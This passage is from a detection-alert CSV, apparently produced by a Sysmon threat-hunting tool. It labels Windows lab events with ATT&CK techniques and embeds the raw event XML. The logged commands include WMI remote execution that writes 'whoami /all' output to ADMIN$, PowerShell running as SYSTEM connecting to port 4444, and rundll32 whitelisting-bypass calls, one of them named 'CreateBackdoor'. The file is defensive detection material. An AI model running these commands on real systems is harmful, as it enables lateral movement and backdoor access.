<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=04C5D2B4DA9A0F3FA8A45702D4256CEE42D8C48D,MD5=92F44E405DB16AC55D97E3BFE3B132FA,SHA256=6C05E11399B7E3C8ED31BAE72014CF249C144A8F4A2C54A758EB2E6FAD47AEC7,IMPHASH=96BA691B035D05F44E35AB23F6BA946C</Data>
<Data Name=""ParentProcessGuid"">365ABB72-6231-5CC7-0000-00104CF71800</Data>
<Data Name=""ParentProcessId"">3940</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1556656513.512339,2019-05-01T00:35:13.512339+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\System32\cmd.exe&quot; /Q /c cd 1&gt; \\127.0.0.1\ADMIN$\__1556656511.61 2&gt;&amp;1 ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-04-30T20:35:13.449839Z"">
</TimeCreated>
<EventRecordID>9838</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""1964"" ThreadID=""1664"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-04-30 20:35:13.434</Data>
<Data Name=""ProcessGuid"">365ABB72-B181-5CC8-0000-0010ADBF1E00</Data>
<Data Name=""ProcessId"">3372</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">6.1.7601.17514 (win7sp1_rtm.101119-1850)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\System32\cmd.exe&quot; /Q /c cd 1&gt; \\127.0.0.1\ADMIN$\__1556656511.61 2&gt;&amp;1</Data>
<Data Name=""CurrentDirectory"">C:\</Data>
<Data Name=""User"">IEWIN7\IEUser</Data>
<Data Name=""LogonGuid"">365ABB72-B17F-5CC8-0000-0020C6A31E00</Data>
<Data Name=""LogonId"">0x1ea3c6</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163</Data>
<Data Name=""ParentProcessGuid"">365ABB72-B17F-5CC8-0000-001082A51E00</Data>
<Data Name=""ParentProcessId"">3572</Data>
<Data Name=""ParentImage"">C:\Windows\System32\mmc.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\system32\mmc.exe -Embedding</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1556656371.371714,2019-05-01T00:32:51.371714+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /Q /c whoami /all 1&gt; \\127.0.0.1\ADMIN$\__1556656369.7 2&gt;&amp;1 ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-04-30T20:32:51.324839Z"">
</TimeCreated>
<EventRecordID>9828</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""1964"" ThreadID=""1664"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-04-30 20:32:51.324</Data>
<Data Name=""ProcessGuid"">365ABB72-B0F3-5CC8-0000-0010C43A1D00</Data>
<Data Name=""ProcessId"">2828</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">6.1.7601.17514 (win7sp1_rtm.101119-1850)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">cmd.exe /Q /c whoami /all 1&gt; \\127.0.0.1\ADMIN$\__1556656369.7 2&gt;&amp;1</Data>
<Data Name=""CurrentDirectory"">C:\</Data>
<Data Name=""User"">IEWIN7\IEUser</Data>
<Data Name=""LogonGuid"">365ABB72-B0F2-5CC8-0000-00203D311D00</Data>
<Data Name=""LogonId"">0x1d313d</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163</Data>
<Data Name=""ParentProcessGuid"">365ABB72-B0C0-5CC8-0000-001017C31C00</Data>
<Data Name=""ParentProcessId"">836</Data>
<Data Name=""ParentImage"">C:\Windows\System32\wbem\WmiPrvSE.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1047] Windows Management Instrumentation - Process,1556656371.371714,2019-05-01T00:32:51.371714+04:00,,Threat,High,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /Q /c whoami /all 1&gt; \\127.0.0.1\ADMIN$\__1556656369.7 2&gt;&amp;1 ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-04-30T20:32:51.324839Z"">
</TimeCreated>
<EventRecordID>9828</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""1964"" ThreadID=""1664"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-04-30 20:32:51.324</Data>
<Data Name=""ProcessGuid"">365ABB72-B0F3-5CC8-0000-0010C43A1D00</Data>
<Data Name=""ProcessId"">2828</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">6.1.7601.17514 (win7sp1_rtm.101119-1850)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">cmd.exe /Q /c whoami /all 1&gt; \\127.0.0.1\ADMIN$\__1556656369.7 2&gt;&amp;1</Data>
<Data Name=""CurrentDirectory"">C:\</Data>
<Data Name=""User"">IEWIN7\IEUser</Data>
<Data Name=""LogonGuid"">365ABB72-B0F2-5CC8-0000-00203D311D00</Data>
<Data Name=""LogonId"">0x1d313d</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163</Data>
<Data Name=""ParentProcessGuid"">365ABB72-B0C0-5CC8-0000-001017C31C00</Data>
<Data Name=""ParentProcessId"">836</Data>
<Data Name=""ParentImage"">C:\Windows\System32\wbem\WmiPrvSE.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1047] Windows Management Instrumentation - Instances of an Active Script Event Consumer - Process,1556656371.371714,2019-05-01T00:32:51.371714+04:00,,Threat,High,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /Q /c whoami /all 1&gt; \\127.0.0.1\ADMIN$\__1556656369.7 2&gt;&amp;1 ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-04-30T20:32:51.324839Z"">
</TimeCreated>
<EventRecordID>9828</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""1964"" ThreadID=""1664"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-04-30 20:32:51.324</Data>
<Data Name=""ProcessGuid"">365ABB72-B0F3-5CC8-0000-0010C43A1D00</Data>
<Data Name=""ProcessId"">2828</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">6.1.7601.17514 (win7sp1_rtm.101119-1850)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">cmd.exe /Q /c whoami /all 1&gt; \\127.0.0.1\ADMIN$\__1556656369.7 2&gt;&amp;1</Data>
<Data Name=""CurrentDirectory"">C:\</Data>
<Data Name=""User"">IEWIN7\IEUser</Data>
<Data Name=""LogonGuid"">365ABB72-B0F2-5CC8-0000-00203D311D00</Data>
<Data Name=""LogonId"">0x1d313d</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163</Data>
<Data Name=""ParentProcessGuid"">365ABB72-B0C0-5CC8-0000-001017C31C00</Data>
<Data Name=""ParentProcessId"">836</Data>
<Data Name=""ParentImage"">C:\Windows\System32\wbem\WmiPrvSE.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
Prohibited Process connecting to internet,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Critical,"User (NT AUTHORITY\SYSTEM) run process C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe and initiated network connection from hostname ( IEWIN7 and IP ( 10.0.2.18 ) to hostname ( ) , IP ( 10.0.2.19 ) and port ( 4444 )",3,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>3</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>3</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-04-30T20:26:54.152964Z"">
</TimeCreated>
<EventRecordID>9813</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""1964"" ThreadID=""1568"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-04-30 20:26:52.794</Data>
<Data Name=""ProcessGuid"">365ABB72-AF8C-5CC8-0000-001003361900</Data>
<Data Name=""ProcessId"">2484</Data>
<Data Name=""Image"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
<Data Name=""Protocol"">tcp</Data>
<Data Name=""Initiated"">true</Data>
<Data Name=""SourceIsIpv6"">false</Data>
<Data Name=""SourceIp"">10.0.2.18</Data>
<Data Name=""SourceHostname"">IEWIN7</Data>
<Data Name=""SourcePort"">49160</Data>
<Data Name=""SourcePortName""></Data>
<Data Name=""DestinationIsIpv6"">false</Data>
<Data Name=""DestinationIp"">10.0.2.19</Data>
<Data Name=""DestinationHostname""></Data>
<Data Name=""DestinationPort"">4444</Data>
<Data Name=""DestinationPortName""></Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1117] Bypassing Application Whitelisting,1579034803.819347,2020-01-15T00:46:43.819347+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32 url.dll,OpenURL ms-browser://)",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-01-14T20:46:43.237922Z"">
</TimeCreated>
<EventRecordID>340</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""1840"" ThreadID=""8032"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-01-14 20:46:43.232</Data>
<Data Name=""ProcessGuid"">747F3D96-28B3-5E1E-0000-00101DF17B00</Data>
<Data Name=""ProcessId"">3412</Data>
<Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">RUNDLL32.EXE</Data>
<Data Name=""CommandLine"">rundll32 url.dll,OpenURL ms-browser://</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-28B3-5E1E-0000-002057EB7B00</Data>
<Data Name=""LogonId"">0x7beb57</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A</Data>
<Data Name=""ParentProcessGuid"">747F3D96-28B3-5E1E-0000-0010CAEC7B00</Data>
<Data Name=""ParentProcessId"">1632</Data>
<Data Name=""ParentImage"">C:\Windows\System32\wbem\WmiPrvSE.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1053] Scheduled Task - Process,1618950794.242705,2021-04-21T00:33:14.242705+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\svchost.exe ) through command line ( C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2021-04-20T20:33:13.741579Z"">
</TimeCreated>
<EventRecordID>578503</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""3392"" ThreadID=""4112"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2021-04-20 20:33:13.680</Data>
<Data Name=""ProcessGuid"">747F3D96-3A89-607F-0000-001028587700</Data>
<Data Name=""ProcessId"">4912</Data>
<Data Name=""Image"">C:\Windows\System32\svchost.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Host Process for Windows Services</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">svchost.exe</Data>
<Data Name=""CommandLine"">C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
<Data Name=""LogonGuid"">747F3D96-82AE-607F-0000-0020E7030000</Data>
<Data Name=""LogonId"">0x3e7</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">System</Data>
<Data Name=""Hashes"">SHA1=A1385CE20AD79F55DF235EFFD9780C31442AA234,MD5=8A0A29438052FAED8A2532DA50455756,SHA256=7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6,IMPHASH=247B9220E5D9B720A82B2C8B5069AD69</Data>
<Data Name=""ParentProcessGuid"">00000000-0000-0000-0000-000000000000</Data>
<Data Name=""ParentProcessId"">612</Data>
<Data Name=""ParentImage"">?</Data>
<Data Name=""ParentCommandLine"">?</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1579034803.819347,2020-01-15T00:46:43.819347+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 url.dll,OpenURL ms-browser:// )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-01-14T20:46:43.237922Z"">
</TimeCreated>
<EventRecordID>340</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""1840"" ThreadID=""8032"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-01-14 20:46:43.232</Data>
<Data Name=""ProcessGuid"">747F3D96-28B3-5E1E-0000-00101DF17B00</Data>
<Data Name=""ProcessId"">3412</Data>
<Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">RUNDLL32.EXE</Data>
<Data Name=""CommandLine"">rundll32 url.dll,OpenURL ms-browser://</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-28B3-5E1E-0000-002057EB7B00</Data>
<Data Name=""LogonId"">0x7beb57</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A</Data>
<Data Name=""ParentProcessGuid"">747F3D96-28B3-5E1E-0000-0010CAEC7B00</Data>
<Data Name=""ParentProcessId"">1632</Data>
<Data Name=""ParentImage"">C:\Windows\System32\wbem\WmiPrvSE.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1085] Rundll32 Execution detected,1579034803.819347,2020-01-15T00:46:43.819347+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 url.dll,OpenURL ms-browser:// )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-01-14T20:46:43.237922Z"">
</TimeCreated>
<EventRecordID>340</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""1840"" ThreadID=""8032"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-01-14 20:46:43.232</Data>
<Data Name=""ProcessGuid"">747F3D96-28B3-5E1E-0000-00101DF17B00</Data>
<Data Name=""ProcessId"">3412</Data>
<Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">RUNDLL32.EXE</Data>
<Data Name=""CommandLine"">rundll32 url.dll,OpenURL ms-browser://</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-28B3-5E1E-0000-002057EB7B00</Data>
<Data Name=""LogonId"">0x7beb57</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A</Data>
<Data Name=""ParentProcessGuid"">747F3D96-28B3-5E1E-0000-0010CAEC7B00</Data>
<Data Name=""ParentProcessId"">1632</Data>
<Data Name=""ParentImage"">C:\Windows\System32\wbem\WmiPrvSE.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1597237536.555348,2020-08-12T17:05:36.555348+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( C:\Windows\SYSTEM32\cmd.exe /c &quot;&quot;C:\Program Files\Npcap\CheckStatus.bat&quot;&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-08-12T13:05:20.029483Z"">
</TimeCreated>
<EventRecordID>342406</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""3344"" ThreadID=""4176"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-08-12 13:05:14.798</Data>
<Data Name=""ProcessGuid"">747F3D96-E90A-5F33-0000-0010863C0100</Data>
<Data Name=""ProcessId"">1740</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.592 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">Cmd.Exe</Data>
<Data Name=""CommandLine"">C:\Windows\SYSTEM32\cmd.exe /c &quot;&quot;C:\Program Files\Npcap\CheckStatus.bat&quot;&quot;</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
<Data Name=""LogonGuid"">747F3D96-E909-5F33-0000-0020E7030000</Data>
<Data Name=""LogonId"">0x3e7</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">System</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-E90A-5F33-0000-00102CF20000</Data>
<Data Name=""ParentProcessId"">1180</Data>
<Data Name=""ParentImage"">C:\Windows\System32\svchost.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1117] Bypassing Application Whitelisting,1584766825.513362,2020-03-21T09:00:25.513362+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor)",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-03-21T05:00:25.499077Z"">
</TimeCreated>
<EventRecordID>243562</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2860"" ThreadID=""3508"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-03-21 05:00:25.488</Data>
<Data Name=""ProcessGuid"">747F3D96-9F69-5E75-0000-00105B9A2000</Data>
<Data Name=""ProcessId"">2028</Data>
<Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
